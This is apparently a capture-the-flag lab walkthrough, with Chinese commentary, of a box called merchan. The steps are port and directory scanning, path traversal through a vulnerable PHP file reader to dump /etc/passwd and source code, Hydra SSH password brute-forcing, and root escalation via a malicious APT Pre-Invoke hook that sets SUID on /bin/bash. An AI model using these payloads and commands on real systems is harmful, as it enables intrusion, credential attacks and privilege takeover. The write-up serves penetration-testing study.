Nmap #
[root@kali] /home/kali/merchan
❯ nmap 192.168.55.77 -sV -A -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-04 23:07 EDT
Nmap scan report for 192.168.55.77
Host is up (0.00028s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0)
| ssh-hostkey:
| 256 da:68:54:15:39:b8:44:ed:b9:08:4c:59:e5:89:50:08 (ECDSA)
|_ 256 b4:7d:98:a8:01:e8:3b:17:43:24:43:39:3a:b4:b8:50 (ED25519)
80/tcp open http Apache httpd 2.4.62
|_http-title: Did not follow redirect to http://merchan.thl
|_http-server-header: Apache/2.4.62 (Debian)
Feroxbuster #
[root@kali] /home/kali/merchan
❯ feroxbuster -u 'http://www.merchan.thl/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x js ⏎
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://www.merchan.thl/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [js]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 31w 277c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 28w 280c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 28w 319c http://www.merchan.thl/images => http://www.merchan.thl/images/
200 GET 8l 29w 28898c http://www.merchan.thl/assets/favicon.ico
200 GET 139l 592w 68236c http://www.merchan.thl/images/camiseta.jpg
200 GET 7l 36w 330c http://www.merchan.thl/js/scripts.js
200 GET 186l 943w 74237c http://www.merchan.thl/images/llavero.jpg
200 GET 10826l 22299w 236792c http://www.merchan.thl/css/styles.css
301 GET 9l 28w 319c http://www.merchan.thl/assets => http://www.merchan.thl/assets/
200 GET 563l 3920w 380306c http://www.merchan.thl/images/sudadera.png
200 GET 130l 399w 7235c http://www.merchan.thl/
301 GET 9l 28w 316c http://www.merchan.thl/css => http://www.merchan.thl/css/
301 GET 9l 28w 315c http://www.merchan.thl/js => http://www.merchan.thl/js/
200 GET 1l 15w 1365c http://www.merchan.thl/secret.js
[####################] - 3m 1102751/1102751 0s found:12 errors:0
[####################] - 3m 1102751/1102751 0s found:12 errors:0
[####################] - 3m 1102751/1102751 0s found:12 errors:0
[####################] - 5m 1102751/1102751 0s found:12 errors:0
[####################] - 5m 220546/220546 740/s http://www.merchan.thl/
[####################] - 5m 220546/220546 726/s http://www.merchan.thl/images/
[####################] - 5m 220546/220546 729/s http://www.merchan.thl/assets/
[####################] - 5m 220546/220546 729/s http://www.merchan.thl/css/
[####################] - 5m 220546/220546 727/s http://www.merchan.thl/js/
发现有一个secret.js
function createLink() {
const _0x199a7f = document.createElement('a');
_0x199a7f.innerText = "Haga click aqui";
_0x199a7f.href = '2e81eb4e952a3268babddecad2a4ec1e.php';
document.body.appendChild(_0x199a7f);
}
createLink();
得到一个php文件,但是无法访问
Nuclei #
[root@kali] /home/kali
❯ nuclei -u http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.2
projectdiscovery.io
[INF] Current nuclei version: v3.4.2 (outdated)
[INF] Current nuclei-templates version: v10.2.2 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 65
[INF] Templates loaded for current scan: 7991
[INF] Executing 7793 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 198 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 1743 (Reduced 1638 Requests)
[INF] Using Interactsh Server: oast.online
[waf-detect:apachegeneric] [http] [info] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php
[openssh-detect] [tcp] [info] merchan.thl:22 ["SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u4"]
[ssh-auth-methods] [javascript] [info] merchan.thl:22 ["["publickey","password"]"]
[ssh-server-enumeration] [javascript] [info] merchan.thl:22 ["SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u4"]
[ssh-sha1-hmac-algo] [javascript] [info] merchan.thl:22
[ssh-password-auth] [javascript] [info] merchan.thl:22
[CVE-2020-19360] [http] [high] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text
[carel-bacnet-gateway-traversal] [http] [high] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd
[CVE-2011-3315] [http] [high] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php
[http-missing-security-headers:clear-site-data] [http] [info] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php
[http-missing-security-headers:content-security-policy] [http] [info] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php
[http-missing-security-headers:x-content-type-options] [http] [info] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php
[http-missing-security-headers:referrer-policy] [http] [info] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php
[http-missing-security-headers:strict-transport-security] [http] [info] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php
[http-missing-security-headers:permissions-policy] [http] [info] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php
[http-missing-security-headers:x-frame-options] [http] [info] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php
[caa-fingerprint] [dns] [info] merchan.thl
看到存在文件读取的漏洞,尝试读取一下源码👇
http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../var/www/html/2e81eb4e952a3268babddecad2a4ec1e.php
$file = $_GET['file'] ?? '';
if ($file) {
echo nl2br(file_get_contents($file));
}
?>
然而无法使用php filter chains攻击
读取一下/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
julia:x:1001:1001:,,,:/home/julia:/bin/bash
Hydra #
进行ssh登录爆破
[root@kali] /home/kali/merchan
❯ hydra -l julia -P /usr/share/wordlists/rockyou.txt ssh://192.168.55.78 -I -V
Root #
上传pspy
apt配置目录是可以写入的
julia@Thehackerslabs-merchan:/tmp$ ls -al /etc/apt/
total 36
drwxr-xr-x 8 root root 4096 ene 21 09:58 .
drwxr-xr-x 69 root root 4096 ene 27 18:53 ..
drwxr-xrwx 2 root root 4096 ene 24 09:27 apt.conf.d
drwxr-xr-x 2 root root 4096 may 25 2023 auth.conf.d
drwxr-xr-x 2 root root 4096 may 25 2023 keyrings
drwxr-xr-x 2 root root 4096 may 25 2023 preferences.d
-rw-r--r-- 1 root root 780 ene 21 09:58 sources.list
-rw-r--r-- 1 root root 0 ene 21 09:51 sources.list~
drwxr-xr-x 2 root root 4096 may 25 2023 sources.list.d
drwxr-xr-x 2 root root 4096 ene 21 09:51 trusted.gpg.d
写入恶意配置和文件
$ echo 'chmod +s /bin/bash' > /tmp/myevil.sh
$ chmod +x /tmp/myevil.sh
$ echo 'APT::Update::Pre-Invoke { "/tmp/myevil.sh"; };' > /etc/apt/apt.conf.d/99evil
